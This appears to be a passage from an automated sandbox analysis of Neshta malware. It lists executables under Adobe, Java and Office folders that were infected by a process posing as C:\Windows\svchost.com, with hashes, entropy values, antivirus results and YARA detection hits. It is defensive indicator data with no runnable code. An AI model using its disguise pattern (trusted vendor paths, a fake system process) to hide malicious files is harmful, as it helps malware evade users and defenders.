                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                        C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):6.5042461329985075
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:JxqjQ+P04wsmJCmGhFAlQY7rMdInNwUdROnIDh+vE6YjhmnCu26W:sr85CAlQGrkInNwUPOnWh+vEzEnCh7
                                                                                                                        MD5:A5EA90AC4FC049DF79D7DB1814B9B326
                                                                                                                        SHA1:1AE4394BAB6F0CEB3F1EE611B460C0FD632E87C5
                                                                                                                        SHA-256:61B25B74A7126A96A87A8D313B850CEAD18B5AB5389E9FF2B2C9A164927A08D2
                                                                                                                        SHA-512:DC6FBDEB7D79AEDB4479A4D8742D15AAA4BEEE97892715406D58E0C5E1511073C85D91B287E7CA75DE376C0C9A6BC2A307115A646600261EDDD6DD287D5AD036
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe, Author: Florian Roth
                                                                                                                        Antivirus:
                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                        C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):6.384524945408535
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:JxqjQ+P04wsmJCmG2kHtSSHuzUfuNAGt1Uv1JwsxtD:sr85CBNrOEuNAsWJwsD
                                                                                                                        MD5:D0B62E96259230D26E500B5D2F6E2488
                                                                                                                        SHA1:86DA8E18DCCD893874C398FDB41EEE85D766A4EC
                                                                                                                        SHA-256:1E2BC4A5441F740B2E9838EAB3964123A2D358B62E1F124C5F1E8BB4E5AB2319
                                                                                                                        SHA-512:BA4E224F4D5C8A5B5E626A7EEE6F35688528244BD7F9323CF74AF219BFA2AAFBB947DDAFD8ED815F564EDE0403B09CDBB1DEFB0A9CE9753A75C8A1C5E912FAFE
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe, Author: Florian Roth
                                                                                                                        Antivirus:
                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                        C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):6.210368811104495
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:JxqjQ+P04wsmJCed9fP4LXRxQyEvzDmxvuLX+:sr85Ca4dOyEv/mxmLO
                                                                                                                        MD5:27D5B0E45DB81F836CF687549F844753
                                                                                                                        SHA1:4EE8AF1DE81163B66C20D4D4C652250D3B116544
                                                                                                                        SHA-256:365857D447BD640AC5A1BA7F32AF69211AD8F7C3AA0345C925FADCD6635D8C44
                                                                                                                        SHA-512:42BC2AAE4F5371F7F6E21CA25A28578929C160C7B0DD629239BF1C1F47C1E59AC5E56E1E33C8C1B074FE5393A88076F214D73729074E72A2AF1F6F83386A573A
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe, Author: Florian Roth
                                                                                                                        Antivirus:
                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                        C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):6.599158686971261
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:JxqjQ+P04wsmJCKhp8N3YERomt8JCeToWZmKbt1H0jKWo:sr85CKn8N3YEuTofE1H0jKWo
                                                                                                                        MD5:294D120414736A7579445CCCA78F505C
                                                                                                                        SHA1:4DC265A2FC75AF686DA3EC830BF9C0072AF14581
                                                                                                                        SHA-256:AF7E482890D77DAD13F0D5A1377DEFA83CF2D802DC1444A69FD17A464C4A446C
                                                                                                                        SHA-512:8DC9F174875DD7012030EC6FE1624AAA99E068DD464BE4AEFDBA9699C39969DF0E52214B90BC46ACE204D2505DDD69C46D674DE39A6BFAA3DE213DFCA66ED196
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe, Author: Florian Roth
                                                                                                                        Antivirus:
                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                        C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):6.6085003171859364
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:JxqjQ+P04wsmJC/rmKN/MZzagYK5o2IQJ/rVSgvV:sr85C/qA/WadUDFBZz9
                                                                                                                        MD5:89DC2A4E5290AE1297C2281B5CD35068
                                                                                                                        SHA1:1D091812669D1D0CF0293B9D495599BF257434D9
                                                                                                                        SHA-256:5116F46AD2BE5B402FAD8B89350F671576D995ECCF91863D827984AE42319596
                                                                                                                        SHA-512:2CECAFADFE911CAEF8F735192F7F1D60305BBBA6A390E13CDB4B5055413D931B75F276086F18AE36E32FEF31DD3B37FDDECD1FDB9F4EC12938B1EFABCD6D7E07
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe, Author: Florian Roth
                                                                                                                        C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):6.62851477500423
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:JxqjQ+P04wsmJCsrkFN/GjcAShJITZOG8i4e53hS5PobC:sr85Csk0cA6JITt8cXbC
                                                                                                                        MD5:61694544EA704A28532F4EC0319AC735
                                                                                                                        SHA1:F6ED53FF2792797D40ECA888567873F0570698E6
                                                                                                                        SHA-256:4183F6849773F9EED9279D5237C93719511F605276F0EB9BF2E8B2258BBAED09
                                                                                                                        SHA-512:5004069D9A41811B63CD84A049757A2F2CB061D1D6999FAE9EC083C4AE3C850BAD9D59112B452118A0AA231A4F07145D03C62FDB699074F4610D4899A662C922
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe, Author: Florian Roth
                                                                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                                                                        C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_885250\java.exe
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):6.653521772684421
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:JxqjQ+P04wsmJC/rmKEs2WzzIR++tGuPkNoAvBFbq6DAcBDjFsb:sr85C/qLWos+tGEkBbq6D3Bdsb
                                                                                                                        MD5:50B7F8BD51D8BEA4542C8B6FB7046568
                                                                                                                        SHA1:46FE9571A136EEDD3DC35089F096D47B32EA74C8
                                                                                                                        SHA-256:86A782FF58F3B5F1736EF23051833E340FD56A77C1EDDDBA8ECC5A507BA47EE0
                                                                                                                        SHA-512:87A46E55F78299DA53343B832D84C81C230D46AEFB71C603998DA5F6D0BB3FFE6FDA5F825F5731F7B810E21C1EF8E9812278D07E7402BB3913AF6DD66DD43CE1
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_885250\java.exe, Author: Florian Roth
                                                                                                                        C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_885250\javaw.exe
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):6.656070779362061
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:JxqjQ+P04wsmJC/rmKKKajo+iKndnTdkCE1A6n82c6jbs2:sr85C/qo0o+iwdnP6ngIs2
                                                                                                                        MD5:60628C314BCF2A97CCFA9CB4241A2DAB
                                                                                                                        SHA1:6EF748A1568A9AE0D541C5CDF0F74430A59E4DE5
                                                                                                                        SHA-256:FD8BD222DB055C39D6050A10F91EEE576ADDFC37CE78F585ACC48F96E222FA90
                                                                                                                        SHA-512:2AC9ED50008A13A4255ABB338C675D53688D321E6086B6DF17B02A3F89896051F60E8565001CE0B7BCEBD0CD211DED9B9574347BC95A05922700C20806EC93EC
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_885250\javaw.exe, Author: Florian Roth
                                                                                                                        C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_885250\javaws.exe
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):6.6397427450636055
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:JxqjQ+P04wsmJC/rmKHLgwHz2xi03XxQy012eqZwE:sr85C/qMsc2Y03BQz2eqZP
                                                                                                                        MD5:7132D6785E73B1159F3AC9AC5DE71A1C
                                                                                                                        SHA1:0EF8C262E63E3776662064D00E5C4264D0213C8B
                                                                                                                        SHA-256:629945249C52DDB4108FF5C239D4E2C79C92A545ECD25DAE395697831D648A5F
                                                                                                                        SHA-512:804BD2E14C52D226F1D470D0C73B3DE7945EA24EA4554D916FF796E24F6C7C6B5A21284396C6359CBD94ACCE87517D19984F207FEED537AE9DDE8C29D04D2A9E
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_885250\javaws.exe, Author: Florian Roth
                                                                                                                        C:\Program Files (x86)\Common Files\microsoft shared\DW\DW20.EXE
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):6.529062771218018
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:JxqjQ+P04wsmJCPQ5vyh0tYhgw2azkO8rn85GF:sr85CPQ5vyhvcOQn2GF
                                                                                                                        MD5:2FECE9074EC51CAA91DDEA7FBB4FFC54
                                                                                                                        SHA1:35BD848191A5C14897883B9A11BECC6DB522A88F
                                                                                                                        SHA-256:B4D954F33DDFC952FDD208E3EFFCD6A1E442DE8D07C9148C4771986F781C294F
                                                                                                                        SHA-512:F9C3249A39CB4206E495EED2A5C6130CCB04874FBFCB9D0D3D854B6625791E88C2BF29A7AE6C5E57B2B5C4EF25F39AA7BAA4B8C989A3A62D9FCFAF9116417AEB
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Common Files\microsoft shared\DW\DW20.EXE, Author: Florian Roth
                                                                                                                        C:\Program Files (x86)\Common Files\microsoft shared\DW\DWTRIG20.EXE
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):6.4112170834310565
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:JxqjQ+P04wsmJCUN8aliPc8ZbyHVftptXvVWi6N8rKca:sr85CU6i/XtXv7+8rKca
                                                                                                                        MD5:BA5A5D15C15E1143A35B5ACB9DA43F23
                                                                                                                        SHA1:BE948D6A40AE1221B2E093B6634D695EEDFAD323
                                                                                                                        SHA-256:075242C15AEF5CC590E716651ED3F1F53A8BD23A37CFA60F827DBE60B7DA8918
                                                                                                                        SHA-512:3E36FA618DF02872C1F5043318A8F945912FC5162F8C9ECE7FDA323F7D8AFD53157C00519E50DA9899DA6BF3117CA82011757B987726F968C3B7B5A632066EDA
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Common Files\microsoft shared\DW\DWTRIG20.EXE, Author: Florian Roth
                                                                                                                        C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\CMigrate.exe
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):6.374994892226591
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:JxqjQ+P04wsmJCrNsxigdJqueeYUOc1wxNXI:sr85CCnneeVV1
                                                                                                                        MD5:BED5A0265D4F2739606BD0C79DB41BDB
                                                                                                                        SHA1:0EAE9CA564CC3B83B4B7CAAF64FED47567C8A6D1
                                                                                                                        SHA-256:713E2E20A467272CF5E174DFF81954001170C7F92143A5F34C2FFAE9B85BDC04
                                                                                                                        SHA-512:FAD8C0A7ED8FBCC7BC9704522B2A35C2BCEA68DE3A614009D49DE7F8C8B35F06DA12E5DA78EF8E96FF72983C33268046521C190C0BD0F8A644887A65DA44B2B8
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\CMigrate.exe, Author: Florian Roth
                                                                                                                        C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\CSISYNCCLIENT.EXE
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):6.305732261424221
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:JxqjQ+P04wsmJCWdVJe84MtsqXZhbkALEwcyj3Y:sr85CKVYpqeyDY
                                                                                                                        MD5:3A6E83146F925E67FD9BD350F823858C
                                                                                                                        SHA1:030EF0512034AE6FFA06C7B42041252A56613799
                                                                                                                        SHA-256:494DC48B1892964FB6D5CBB19DACBE990434EED9DEE1BD64D9E74D14681717F3
                                                                                                                        SHA-512:F06ABB303461C6F016470C343DBDACB154C2575095B67B0A2620DBF6E7F799BEC18A6F5E3C678DB107F98764701DE33C75C1E6FC08ADD22FF6D486164DC17336
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\CSISYNCCLIENT.EXE, Author: Florian Roth
                                                                                                                        C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\FLTLDR.EXE
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):6.375840229458048
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:JxqjQ+P04wsmJCUK78LyRHC/T5ICzzKgHiTs33fSQ19uk:sr85CUdGS2gHN3aQ1p
                                                                                                                        MD5:8D7C662937FFE3C3AA129DD3BA7B887F
                                                                                                                        SHA1:F67F3B5C32BF6CC3DEA744DAAB16177DD86DBFF6
                                                                                                                        SHA-256:656ED573131580248ACC968FABBA2197657EAEE8DD6D0BA533A50DD34E74B603
                                                                                                                        SHA-512:71235707D208BEA37FA95A5BD5EF10F768740621008A50B3E440C70B86039AC2428E8B7105A93921DD8DF659AD35C36BB4BFA2C922335680CC1660B48FD54B4A
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\FLTLDR.EXE, Author: Florian Roth
                                                                                                                        C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\LICLUA.EXE
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):6.461871956296466
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:JxqjQ+P04wsmJCqi4IvHjjWhQmgBhtV+mLtiqdSo:sr85CqThgpLTso
                                                                                                                        MD5:CE04DA14A0724F9E950D41F9B2CC1643
                                                                                                                        SHA1:EFF607BAD3A4CB05CC38065E45DC61555618A060
                                                                                                                        SHA-256:D90265A2653E732290DD6617ADD54CA1B2981481AE6B6C18C570D4552C84E826
                                                                                                                        SHA-512:6E548630AF301C8F472BACCB487C31E7E4092E3B25F439D585F36F0A24846C6C0F4A3AF34BE25389D9B9FDF6C1A03A9A8106F9FD777BFB4D1F824A29844E5803
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\LICLUA.EXE, Author: Florian Roth
                                                                                                                        C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\MSOICONS.EXE
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):5.119504084682648
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:768:eyxqjQl/EMQt4Oei7RwsHxyP7nbxzOQdJxqs0y0gqotvngnYkJZZZZZZZZZZZZZz:JxqjQ+P04wsmJC2L4Y4YkvJt
                                                                                                                        MD5:EF92B40044CB210120E9889CA1DC1D5C
                                                                                                                        SHA1:EEDCB5BA7F70F04C3D25AD321C93F978E5E1C7A8
                                                                                                                        SHA-256:016D35F82750ECF792D64A6CFF5D376DB69F2BA1D30BEF80978CCBE84ACFFD0B
                                                                                                                        SHA-512:DBB2EC69392CFFA9ABC8EB0E2C979E5CD4F6A806E14D53F87E8D041E7F0D25816D13363FA66F97FB93DABA8E5CBB17D617029A87BBB31CDECE9A48745E321062
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\MSOICONS.EXE, Author: Florian Roth
                                                                                                                        C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\MSOSQM.EXE
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):4.799951544005101
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:768:eyxqjQl/EMQt4Oei7RwsHxyP7nbxzOQdJbR+QDxQPcfwBOB6ZZZZZZZZZZZZZbJO:JxqjQ+P04wsmJCC+WxQ0lEJRaCA
                                                                                                                        MD5:7078371E0D358B86D46D6CF87987C8CD
                                                                                                                        SHA1:6F58E6F33BB9242034F7C6CDCF17B637C060C8BA
                                                                                                                        SHA-256:2DE937273CBFE6AA5909EFD083FFE477DC7CF37739F12923E2B2FB1B1B6E17B1
                                                                                                                        SHA-512:13449BFDB7AABDC75EC51F1FCB5FE95761C22E3F9E4D1A1CBB5BFC0A3F8FE2AB2FDC3ACD0BAA0D5BADDF0CD0DB390788C60B9C664C3E3FDCC29537347B83E4EF
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\MSOSQM.EXE, Author: Florian Roth
                                                                                                                        C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\MSOXMLED.EXE
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):6.05148718063145
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:JxqjQ+P04wsmJCPkMrdYJnRQV6J4tuw62roH5lL1u:sr85C9rsRQIouwjQlL
                                                                                                                        MD5:D4B144B9963B3114F1D938F44200AE62
                                                                                                                        SHA1:F14C2F8BD9BD0CAC7A682D453C58B99858D6C0CE
                                                                                                                        SHA-256:CB49C8EA020EABA89BB5032060928901AA90BA2530CD5D5467D15AAB489747DA
                                                                                                                        SHA-512:80D70AAF806C46388447A4BF0DF9A98C7DBC211E290A60F3A30C560E09BF12BBDCDABB4DA0B945A8144CBE8D2B22CD4F0D9AFF4DBC33E8FBCB7DAA8244CEDA95
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\MSOXMLED.EXE, Author: Florian Roth
                                                                                                                        C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):6.365915780903398
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:JxqjQ+P04wsmJC+rie7lHfYdCtBzNKxmtshDucWs/7VOb88sirz:sr85C+rN7btBAxm2Z/ps/rz
                                                                                                                        MD5:43B8EBCCF6312172AF0638D6EA2E9A4B
                                                                                                                        SHA1:C628EBF5D72FDA6B9BE07CB69312472906E1143B
                                                                                                                        SHA-256:B42F96D408CFDB35545C5900EC0E8AE72B85FC960DC4BDBDEFD0B6A4BF3A49C3
                                                                                                                        SHA-512:773A5C800CA9EE738A6152D0B9B6F1CFC410407F95CA84D72951C4D8BFE914659FD66892A927174278BA77B5190BF74B98B806E6A78AAAE2D70277345AEAFC4C
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe, Author: Florian Roth
                                                                                                                        C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\Oarpmany.exe
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):6.420838658743323
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:JxqjQ+P04wsmJCVNAa6ZUmWtWHpy7+OAqbrefMSy8A:sr85CVNB6zLy79b8A
                                                                                                                        MD5:58473BD19292BBBB9CE1C6BFAE872648
                                                                                                                        SHA1:D9B5084A65CF3C039D51AE4F1C39C7E5DD83DBCC
                                                                                                                        SHA-256:328E9B6CE1A7D1B4B8B602F1A2D61C56BF85CEC9293C55C047584937C9390C3D
                                                                                                                        SHA-512:E0A19F3C91BC3433D5AD83C78135346769889BA06EB56F92AE3137CB7769582BA5F6139524EEFFE238B67CDA3BCC8854F2E59283E60D23BD555DEB6152310872
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\Oarpmany.exe, Author: Florian Roth
                                                                                                                        C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\Office Setup Controller\ODeploy.exe
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):6.364257425575085
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:JxqjQ+P04wsmJCRtWit2d+BkpzTscsot7h:sr85CRtWo2Q+ycsAh
                                                                                                                        MD5:9180D3CEE013A6DE40DD963A16951734
                                                                                                                        SHA1:18E74AD691F4448AA451FBE5AB7D374F24CB07B4
                                                                                                                        SHA-256:299E81E2FE407A151C56B24E904AA2B0B9C18F712A0B43E704034939AAD1B564
                                                                                                                        SHA-512:DBDE2F6EED630ADADC7F58FFA269DCFE2749F499B8C5DE0927DE47EFF55FB7B6A185B1323DA55307228D117629B79152638B129D92562ACCA208555E7105F9EF
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\Office Setup Controller\ODeploy.exe, Author: Florian Roth
                                                                                                                        C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\Office Setup Controller\Setup.exe
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):6.435519044418047
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:JxqjQ+P04wsmJCxKZg7inyp+gsnV3SNjDBII0DNC:sr85Cx4g7Ky1p7
                                                                                                                        MD5:E7868326F5EF4E85A0FBAEC678D13A2C
                                                                                                                        SHA1:7E57578EA08482DA52474EEB3960CD4407225A59
                                                                                                                        SHA-256:D702CB2F33424FDBCE4EF3CB5B2C0DA789758F4EA6A4AB772591F110369F90F4
                                                                                                                        SHA-512:F56B049C81F2433875840455C18FF972C848C4AE0F04CCFD5BBE5C2222A26680AF3B86A301F9886A84C8D4EAC8861786AAEE224278E96F85B999BF4DA7E3306D
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\Office Setup Controller\Setup.exe, Author: Florian Roth
                                                                                                                        C:\Program Files (x86)\Common Files\microsoft shared\Source user\OSE.EXE
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):6.278417014765199
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:768:eyxqjQl/EMQt4Oei7RwsHxyP7nbxzOQdJBr+YKB8MXTVul6YekIfQzbL2Vo8/nXS:JxqjQ+P04wsmJCUyYKBRXM6PaGxZCP
                                                                                                                        MD5:4C6732F9F7CF89C1BC807F26552F0592
                                                                                                                        SHA1:9790303D2B8FD2C4DEC80D34C7E7D61081DDB03B
                                                                                                                        SHA-256:16A32ABF53E0246C49D984F31FA56B612A818BFA4FFF7681196DEC4F6343F19F
                                                                                                                        SHA-512:56D5EDE482CFE2DEFEE022CEB66EF839E9B47F33D8A270E060A729D70FF03F74A8C1699492C8C2BFB88B70483153C79A5890B31FEB3C7B3BCDB0AFC9D4FE59A7
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
